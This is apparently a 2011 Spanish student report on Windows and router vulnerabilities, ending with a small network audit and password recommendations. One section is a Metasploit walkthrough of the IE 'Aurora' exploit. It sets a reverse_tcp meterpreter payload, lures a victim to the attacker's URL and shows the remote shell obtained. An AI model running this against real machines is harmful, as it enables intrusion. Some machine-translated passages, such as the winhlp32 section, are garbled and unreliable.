vulnerabilidades de windows

VULNERABILIDADES DE WINDOWS

Vulnerabilidades de Windows

16 de mayo de 2011

Página 2

INTRODUCCION:

El siguiente documento contiene lo que son algunas de las vulnerabilidades del Sistema Operativo

Windows, las cuales pueden ocasionar que a través de ellas se produzca algún tipo de ataque que

afecte la seguridad de la datos que se encuentren almacenados dentro del equipo.

El detectar los posibles ataques a los que se puede ver afectado ayuda a brindar una mayor

seguridad al sistema. Y prevenir que se vea atacado por personas que le den un mal uso a la

información o que ocasionen graves problemas dentro de la organización.

Así como también se darán a conocer algunas de las vulnerabilidades que se tienen en el uso de

algunos tipos de rauters.

Vulnerabilidad en DNS

Microsoft ha reportado que está investigando reportes de ataques que explotan una vulnerabilidad

en el servicio DNS (DomainNameSystem) de servidor en sistemas Microsoft Windows 2000 SP4,

Windows Server 2003 SP1, y Windows Server 2003 SP2. La vulnerabilidad es del tipo buffer

overrun (desbordamiento de memoria) en la interfaz RPC (RemoteProcedureCall) del servicio DNS.

RPC es un protocolo que un programa puede usar para requerir un servicio desde un programa

alojado en otra computadora en la red. De acuerdo con el reporte de Microsoft, los intentos para

explotar esta vulnerabilidad podrían permitir a un atacante ejecutar código en el contexto de


16 de mayo de 2011

Página 3

seguridad del servicio DNS, que de forma predeterminada se ejecuta como SYSTEM local. Hasta la

fecha no existe parche de seguridad para corregir la vulnerabilidad

Ataque por Correo Electronico

Para que tenga éxito este tipo de ataque, el atacante tendría que enviar un correo electrónico con un

archivo adjunto de Microsoft Word o Power Point que incluyera una imagen en miniatura

especialmente manipulada y convenciera al usuario de que abriera dicho documento, ha explicado

la compañía.

El atacante, asegura Microsoft, también podría poner el archivo con la imagen maliciosa en una red

compartida y que las víctimas potenciales llegaran a la localización del archivo a través del

explorador de Windows.

El fallo, que afecta al motor de renderización gráfica de Windows, podría permitir que un atacante

ejecutara código arbitrario en el contexto de seguridad del usuario conectado, lo que significa que

las cuentas que están configuradas para tener menos derechos se verían afectadas menos.

La vulnerabilidad afecta a Windows XP Service Pack 3, XP Professional x64 EditionService Pack

2, Server 2003 Service Pack 2, Server 2003 x64 EditionService Pack 2, Server 2003 con SP2 para

sistemas basados en Itanium, Vista Service Pack 1 y Service Pack 2, Vista x64 EditionService Pack

1 y Service Pack 2, Server 2008 para 32-bit, 64-bit, y sistemas basados en Itanium.

El problema no afecta al sistema operativo para PC más reciente de Microsoft, Windows 7, ni a su

sistema operativo para servidores, Windows Server 2008 R2.

Ataques Land

Tanto Windows XP SP2 como W2003 siguen siendo vulnerables a ataques LAND. Este tipo de

ataques no son nuevos y se producen cuando la máquina víctima recibe paquetes SYN con la

misma IP de origen y destino, lo que provoca que empiece a generar paquetes ACK tratando de

responderse a sí misma en lo que podría ser un bucle sin fin, con alto consumo de CPU y

saturación, llegándose a la denegación de servicio. Es algo que los reglajes internos de

algunos firewalls y routers evitan, filtrando los paquetes con la misma dirección de origen y destino.

Defecto en archivo de Windows

Muchas funciones claves de Windows se ven amenzadas con la alta vulnerabilidad que presenta el

componente del núcleo llamado win32k.sys, el cual puede ser atacado por usuarios locales y

ocasiona la aparición de la famosa pantalla azul, ícono de las fallas graves de sistema.

Este defecto también permite al atacante ejecutar códigos libremente, lo que puede ocasionar

diferentes problemas al sistema operativo, dependiendo de la amplitud de acción de quien intenta

hacer el daño.

El componente win32k.sys se encarga de gestionar las ventanas y los gráficos 2D de Windows, por

lo que su función es clave a nivel de usuario. Una manipulación maliciosa de este archivo puede

hacer colapsar la parte gráfica de Windows y con ello la pantalla, entre otras cosas.


16 de mayo de 2011

Página 4

La vulnerabilidad de este componente afecta a Windows XP, Windows Server 2003, Windows

Vista, Windows Server 2008, Windows Server 2008 R2 y Windows 7, tanto para x86 y x64, tengan

o no añadidos Service Packs.

Esta falla también hace posible que cualquier usuario normal pueda acceder como si tuviera

privilegios y, a partir de eso, ejecutar las alteraciones maliciosas en el sistema.

Windows XP SP3 IE 7,8 Ejecución remota de código

Este ataque, funciona con internet explorer 7,8 pero sólo cuando se utiliza en windows XP. Si se

utiliza Vista o windows 7, No son vulnerables.

El error, en el archivo WinHlp32.exe va en el desbordamiento de la pila, y nos permite ejecutar

código.

Es posible invocar winhlp32.exe desde Internet Explorer 8,7,6 con VBScript. Pasando

malintencionado.Podría permitir archivo HLP winhlp32 atacante remoto ejecutar comandos

arbitrarios. Además, existe una vulnerabilidad de desbordamiento de pila en winhlp32.exe.

Se ve afectado Windows XP SP3 no afecta a Vista, Windows 7.

Para activar la vulnerabilidad es necesaria alguna interacción del usuario. Víctima tiene que

Presione F1 cuando se muestra el menú emergente MsgBox.

Sintaxis de la función MsgBox:

MsgBox(prompt[,buttons][,title][,helpfile,context])

Es posible pasar compartido remoto samba como parámetro helpfile. Además hay un búfer de pila

basada desbordamiento cuando helpfile ,parámetro es demasiado largo. Sin embargo, en XP

winhlp32.exe se compila con /Bandera de GS, que, en este caso, efectivamente proteger la pila.

La vulnerabilidad permite a un atacante remoto ejecutar código arbitrario en

máquina de la víctima.

Hackear WINDOWS con metasploit y IE

Usando este exploit, Podremos tomar el control de la máquina remota con los privilegios del

usuario que está navegando por internet. Ataque realizado desde Ubuntu a Windows.

La primera cosa a hacer, que Metasploit está abierto en la consola


16 de mayo de 2011

Página 5

Una vez instalado, o si ya tenemos, la primera cosa a hacer, actualizar la vulnerabilidad para

obtener lo que, a continuación, escribir:

svnupdate

abrirlo:

sudo ./msfconsole

Pues ahora se sube la vulnerabilidad. A continuación, el tipo de consola:

use exploit/windows/browser/ms10_002_aurora

acontinuación,:

set PAYLOAD windows/meterpreter/reverse_tcp

acontinuación,:

set LHOST NOSTRO IP (lo possiamovedere digitando: ifconfig )

acontinuación,:

set URIPATH /

y finalmente lanzar el ataque escribiendo:

exploit

En este punto se tiene una salida como esta:

[*] Exploit running as background job.

[*] Started reverse handler on port 4444

[*] Local IP: http//NOSTRO_IP:8080/

[*] Server started.

msfexploit(ie_aurora) >

En este momento tan visite nuestra “Buddy” Esta dirección:

http//NOSTRO_IP:8080/

Una vez que nuestro compañero visitará esa dirección, Tendremos una salida como esta:

[*] Sending stage (723456 bytes)

[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)

pues ahora se debe escribir:

sessions -i 1

Ahora para abrir el tipo de concha:

Shell

Recibimos esta salida:

Process 892 created.

Channel 1 created.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>

Vulnerabilidades más críticas de los sistemas Windows


16 de mayo de 2011

Página 6

Existencia de servidores web y sus servicios asociados

Cuando se instala un servidor web en un equipo Windows, en su configuración por defecto, se

activan algunos servicios y/o configuraciones que son vulnerables a diversos tipos de ataques, que

van desde la denegación de servicio hasta el compromiso total del sistema.

Si la máquinadebe actuar como servidor web, es preciso verificar que la versión del mismo está

actualizada, se ha fortalecido la configuración y se han desactivado los servicios innecesarios.

Es importante indicar que algunas versiones de Windows instalan, en su configuración por defecto,

el servidor web IIS.

Servicio Workstation

Existe una vulnerabilidad de desbordamiento de búfer en el servicio Workstation de Windows 2000

(SP2, SP3 y SP4) y Windows XP (hasta SP1) que puede ser utilizada por un usuario remoto para

forzar la ejecución de código en los sistemas vulnerables. Éste código se ejecutará en el contexto de

seguridad SYSTEM, lo que permite un acceso completo en el sistema comprometido.

Servicios de acceso remoto de Windows

Todas las versiones de Windows incluyen mecanismos para permitir el acceso remoto tanto a las

unidades de disco y al registro así como para la ejecución remota de código. Estos servicios han

demostrado ser bastante frágiles y la existencia de numerosas vulnerabilidades ha sido uno de los

mecanismos preferidos por los gusanos y virus para propagarse. Es muy importante verificar que se

han aplicado las diversas actualizaciones publicadas para impedir la acciones de los mismos.

Microsoft SQL Server

El gestor de base de datos de Microsoft ha sido, tradicionalmente, un producto con un nivel de

seguridadmuybajo.

Por un lado, existen un gran número de vulnerabilidades de seguridad, muchas de ellas críticas, que

pueden ser utilizadas para acceder y/o modificar a la información almacenada en las bases de datos.

Peroademás, la configuración por defecto de Microsoft SQL Server facilita que sea utilizado como

plataforma para la realización de ataques contra otros sistemas. Podemos recordar los gusanos

SQLSnake y Slammer que tuvieron un efecto perceptible en toda la red Internet.

Autenticación de Windows

Es habitual encontrar equipos Windows con deficiencias en sus mecanismos de autenticación. Esto

incluye la existencia de cuentas sin contraseña (o con contraseñas ampliamente conocidas o

fácilmente deducibles). Por otra parte es frecuente que diversos programas (o el propio sistema

operativo) cree nuevas cuentas de usuario con un débil mecanismo de autenticación.


16 de mayo de 2011

Página 7

Por otra parte, a pesar de que Windows transmite las contraseñas cifradas por la red, dependiendo

del algoritmo utilizado es relativamente simple aplicar ataques de fuerza bruta para descifrarlos en

un plazo de tiempo muy corto. Es por tanto muy importante verificar que se utilizado el algoritmo

de autenticación NTLMv2.

Navegadores web

Los diversos navegadores habitualmente utilizados para acceder a la web pueden ser un posible

punto débil de las medidas de seguridad si no se han aplicado las últimas actualizaciones.

Internet Explorer es, sin duda, el producto para el que se han publicado más actualizaciones y que

cuenta con algunos de los problemas de seguridad más críticos. No obstante debe recordarse que

otros navegadores como Opera, Mozilla, Firefox y Netscape también tienen sus vulnerabilidades de

seguridad.

Aplicaciones de compartición de archivos

Las aplicaciones P2P se han popularizado en los últimos años como un sistema para la compartición

de información entre los usuarios de Internet, hasta el punto de convertirse en uno de los métodos

preferidos para obtener todo tipo de archivos. De hecho, muchos usuarios seguramente no

entenderían la red actual sin la existencia de las aplicaciones P2P.

No obstante, algunas aplicaciones populares de compartición de archivos tienen serios problemas de

seguridad que pueden ser utilizados por un atacante para obtener el control del ordenador del

usuario.

Otro riesgos habituales, no estrictamente de seguridad pero si relacionado ya que atentan contra

nuestra privacidad, son los diversos programas espías incluidos en algunas de las aplicaciones más

populares de compartición de archivos.Otro problema habitual es la compartición inadvertida de

archivos quecontieneninformación sensible.

Por último, en los últimos meses se ha popularizado la utilización de las redes P2P como un nuevo

mecanismo para la distribución de virus y gusanos.

Subsistema LSAS

El subsistema LSAS (Local Security AuthoritySubsystem) de Windows 2000, Windows Server

2003 y Windows XP es vulnerable a diversos ataques de desbordamiento de búfer que pueden

permitir a un atacante remoto obtener el control completo del sistema vulnerable. Esta

vulnerabilidad ha sido explotada por gusanos como el Sasser.

Programa de correo


16 de mayo de 2011

Página 8

Diversas versiones de Windows incluyen de forma estándar el programa de correo Outlook Express.

Se trata de un producto que, si no se encuentra convenientemente actualizado, puede fácilmente

comprometer la seguridad del sistema.

Los principales problemas de seguridad asociados a Outlook Express son la introducción de virus

(sin que sea necesario ejecutar ningún programa) y el robo de información sensible.

Las versiones actuales de Outlook Express, configuradas de una forma adecuada, protegen al

usuario ante estos problemas de seguridad.

Sistemas de mensajería instantánea

La mensajería instantánea ha pasado de ser un sistema de comunicación utilizado básicamente para

contactar con amigos y familiares a ser una herramienta de comunicación habitualmente utilizada

en las empresas, especialmente entre aquellas que disponen de diversos centros de trabajo.

Los diversos programas de mensajería instantánea pueden ser víctimas de ataques explotables de

forma remota y que pueden ser utilizados para obtener el control de los sistemas vulnerables.

Es conveniente que el usuario de estos productos verifique que utiliza la versión actual, con las

últimas actualizaciones de seguridad.

VULNERABILIDADES DE LOS RAUTERS

Suplantación de identidad

Son susceptibles a interceptar y redireccionar tráfico a fin de acceder a la configuración del router; e

incluso a los datos de los ordenadores de la red local.

Esto se consigue haciendo que la víctima visite una página web diseñada para que “engañe” al

router y tome como IP secundaria de la página web la misma que la IP del router. El engaño se

basa en una antigua técnica llamada “DNS rebinding”. La facilidad en el acceso a la configuración

del router, se ve afectada si ha sido cambiada los datos de acceso por defecto del router,

dificultando así el acceso al panel de configuración del mismo.

Se recomienda cambiar los datos de acceso a la configuración del router; siempre y

cuando el usuario/contraseña sean los que venían por defecto en el router.

Ataques mediante UPnP

El protocolo UPnP (Universal Plug and Play) permite que diferentes dispositivos en una red

"conversen" entre ellos y que puedan autoconfigurarse. Por ejemplo, una aplicación de mensajería

como el Messenger utiliza el puerto 1503 para recibir un fichero de uno de nuestros contactos.

Mediante UPnP, es capaz de detectar y configurar el firewall de la red para abrir y redireccionar

este puerto.

http://es.wikipedia.org/wiki/Universal_Plug_and_Play

http://technet.microsoft.com/en-us/library/bb457095.aspx


16 de mayo de 2011

Página 9

Lo que se advierte es la facilidad con la que cualquier aplicación web puede modificar la

configuración de nuestra red. Simplemente visitando un sitio web malicioso que contenga un flash

con las instrucciones precisas puede modificar por ejemplo los DNS utilizados por nuestro router.

Este es el proceso normal de un dispositivo UPnP

1. Un dispositivo se conecta a la red

2. Obtiene una IP mediante DHCP

3. Lanza una petición UDP a 239.255.255.250:1900 y espera respuesta de los equipos con

UPnP

4. Estos responden anunciando la URL desde la que pueden ser controlados

5. El dispositivo envía mensajes SOAP a esta URL con los cambios necesarios

Lo que hace la aplicación flash, es llamar directamente a esa URL, solicitando por ejemplo el

cambio de DNS. Esta URL de control es distinta en cada modelo de router por lo que el riesgo se

reduce, ya que la aplicación flash deberá probar con cientos de URLs si quiere soportar el máximo

número de routers.

Es especialmente grave en el caso de los routerswifi, ya que cualquier cliente conectado puede

utilizar una herramienta UPnP para manipular los parámetros del router..De momento la solución

pasa por desactivar la característica UPnP en el router.

HERRAMIENTAS PARA HACKEAR

CAIN AND ABEL

Cain and Abel es una herramienta diseñada especialmente para administradores de redes con la que

puedes comprobar el nivel de seguridad de una red local doméstica o profesional.

El programa permite recuperar contraseñas de una amplia variedad de protocolos, entre ellos FTP,

SMTP, POP3, HTTP, MySQL, ICQ, Telnet y otros, además de poder recuperar también las claves

ocultas en Windows bajo la típica línea de asteriscos.

El programa incluye otras utilidades destinadas a la administración y control de redes.

HERRAMIENTAS PARA LINUX.

http://www.gnucitizen.org/blog/hacking-the-interwebs




16 de mayo de 2011

Página 10

Ettercap

es un interceptor/sniffer/registrador para LANs con switch.

SSLStrip

una herramienta que automatiza el ataque sobre la conexión SSL.

Driftnet

programa que escucha el tráfico de red y elige imágenes de flujos TCP que observa.

WiFiSlax

es una distribución GNU/Linux en formato *.iso con funcionalidades de LiveCD y LiveUSB

pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en

general.

WiFiSlax incluye una larga lista de herramientas de seguridad y auditoría listas para ser utilizadas,

entre las que destacan numerosos escáner de puertos y vulnerabilidades, herramientas para creación

y diseño de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría

wireless, además de añadir una serie de útiles lanzadores.


16 de mayo de 2011

Página 11

FUENTES

http://www.clshack.it/es/exploit-windows-xp-sp3-ie-7-8-remote-code-execution.html

http://www.clshack.it/es/hack-windows-con-metasploit-e-ie-0day-aka-aurora-exploit.html

http://www.auditoria.com.mx/not/incidant.htm

http://blog.digitalmarketing.cl/defecto-en-archivo-de-windows-lo-hace-vulnerable-a-ataques/

http://www.somoslibres.org/modules.php?name=News&file=article&sid=307

http://bandaancha.eu/articulo/5312/mayoria-routers-son-vulnerables-ataques-mediante-upnp

http://foro.elhacker.net/hacking_linuxunix/how_to_sniffing_en_linux_ettercapsslstripdriftnet-

t280295.0.html#ixzz1OYsIn94v

http://es.wikipedia.org/wiki/WiFiSlax

http://www.clshack.it/es/exploit-windows-xp-sp3-ie-7-8-remote-code-execution.html

http://www.clshack.it/es/hack-windows-con-metasploit-e-ie-0day-aka-aurora-exploit.html

http://www.auditoria.com.mx/not/incidant.htm

http://blog.digitalmarketing.cl/defecto-en-archivo-de-windows-lo-hace-vulnerable-a-ataques/

http://bandaancha.eu/articulo/5312/mayoria-routers-son-vulnerables-ataques-mediante-upnp


16 de mayo de 2011

Página 12

REPORTE

1. Una de las principales vulnerabilidades detectadas fue que la red no tenía contraseña y era

pública.

2. El rauter tenía 2 usuarios un User y un Admin, el user no tenía contraseña y la contraseña del

Admin se podía obtener viendo las propiedades del rautes con el User y la contraseña estaba basada

solo en números.

3. Cuando hay actividad en el servidor, con las herramientas para hackear es más fácil encontrar la

contraseña ya que se empiezan a generar aún más paquetes.

4. La red se encontraba oculta, pero con herramientas para administrar el tráfico de red, se pueden

detectar.

RECOMENDACIONES

1. La red debería tener contraseña.

2. El rauter no tendría que tener la misma contraseña en el admin y el user.

3. Las contraseñas deberían contener tanto números como letras para que sea más difícil de

descifrar.

4. El servidor debe tener contraseña para que no sea fácil el conectarse por escritorio remoto.

5. Se deben fijar directivas para que no se pueda acceder tan fácilmente a los archivos dentro del

servidor.